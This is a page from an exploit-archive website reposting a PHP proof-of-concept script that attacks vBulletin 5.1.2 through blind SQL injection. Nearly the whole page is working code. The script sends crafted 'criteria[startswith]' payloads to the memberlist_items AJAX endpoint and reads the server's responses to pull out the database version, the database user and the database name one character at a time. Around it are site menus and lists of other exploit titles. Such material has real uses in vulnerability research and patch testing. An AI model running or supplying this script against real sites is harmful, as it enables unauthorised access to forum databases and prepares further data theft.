首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
vBulletin 5.1.2 SQL Injection
来源:Romanian Security Team 作者:Nytro 发布时间:2014-07-22  
<?php
 
/*
    Author: Nytro
    Powered by: Romanian Security Team
    Price: Free. Educational.
*/
 
 
error_reporting(E_ALL);
ini_set('display_errors', 1);
 
 
// Get arguments
 
 
$target_url = isset($argv[1]) ? $argv[1] : 'https://rstforums.com/v5';
$expression = str_replace('/', '\\/', $target_url);
 
 
// Function to send a POST request
 
 
function httpPost($url,$params)
{
    $ch = curl_init($url);
 
 
    curl_setopt($ch, CURLOPT_URL,$url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER,true);
    curl_setopt($ch, CURLOPT_HEADER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $params);
     
    curl_setopt($ch, CURLOPT_HTTPHEADER, array(
        'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
        'Accept: application/json, text/javascript, */*; q=0.01',
        'X-Requested-With: XMLHttpRequest',
        'Referer: https://rstforums.com/v5/memberlist',
        'Accept-Language: en-US,en;q=0.5',
        'Cookie: bb_lastvisit=1400483408; bb_lastactivity=0;'
     ));
 
 
    $output = curl_exec($ch);
     
    if($output == FALSE) print htmlspecialchars(curl_error($ch));
 
 
    curl_close($ch);
    return $output;
}
 
 
// Function to get string between two other strings
 
 
function get_string_between($string, $start, $end)
{
    $string = " ".$string;
    $ini = strpos($string,$start);
    if ($ini == 0) return "";
    $ini += strlen($start);
    $len = strpos($string,$end,$ini) - $ini;
    return substr($string,$ini,$len);
}
 
 
// Get version
 
 
print "\r\nRomanian Security Team - vBulltin 5.1.2 SQL Injection\r\n\r\n";
print "Version: ";
 
 
$result = httpPost($target_url . '/ajax/render/memberlist_items',
        'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version(),1  ,1)--+"+' .
        '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
 
 
$letter = 1;
 
 
while(strpos($result, 'No Users Matched Your Query') == false)
{
    $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);
 
 
    $username = get_string_between($exploded[1], '">', '<\/a>');
    print $username[0];
     
    $letter++;
    $result = httpPost($target_url . '/ajax/render/memberlist_items',
            'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version(  ),' . $letter . ',1)--+"+' .
            '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}
 
 
// Get user
 
 
print "\r\nUser: ";
 
 
$result = httpPost($target_url . '/ajax/render/memberlist_items',
        'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),1  ,1)--+"+' .
        '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
 
 
$letter = 1;
 
 
while(strpos($result, 'No Users Matched Your Query') == false)
{
    $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);
 
 
    $username = get_string_between($exploded[1], '">', '<\/a>');
    print $username[0];
 
 
    $letter++;
    $result = httpPost($target_url . '/ajax/render/memberlist_items',
            'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),' . $letter . ',1)--+"+' .
            '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}
 
 
// Get database
 
 
print "\r\nDatabse: ";
 
 
$result = httpPost($target_url . '/ajax/render/memberlist_items',
        'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(),  1,1)--+"+' .
        '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
 
 
$letter = 1;
 
 
while(strpos($result, 'No Users Matched Your Query') == false)
{
    $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);
 
 
    $username = get_string_between($exploded[1], '">', '<\/a>');
    print $username[0];
 
 
    $letter++;
    $result = httpPost($target_url . '/ajax/render/memberlist_items',
            'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(),  ' . $letter . ',1)--+"+' .
            '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}
 
 
print "\r\n"
 
 
?>


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Linux Kernel ptrace/sysret - L
·Microsoft XP SP3 BthPan.sys Ar
·MTS MBlaze Ultra Wi-Fi / ZTE A
·Microsoft XP SP3 MQAC.sys Arbi
·Raritan PowerIQ 4.1.0 - SQL In
·Kolibri WebServer 2.0 - GET Re
·IBM GCM16/32 1.20.0.22575 - Mu
·DjVuLibre <= 3.5.25.3 - Out of
·OpenVAS Manager 4.0 - Authenti
·Apache 2.4.x mod_proxy Denial
·ACME micro_httpd - Denial of S
·Omeka 2.2.1 - Remote Code Exec
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved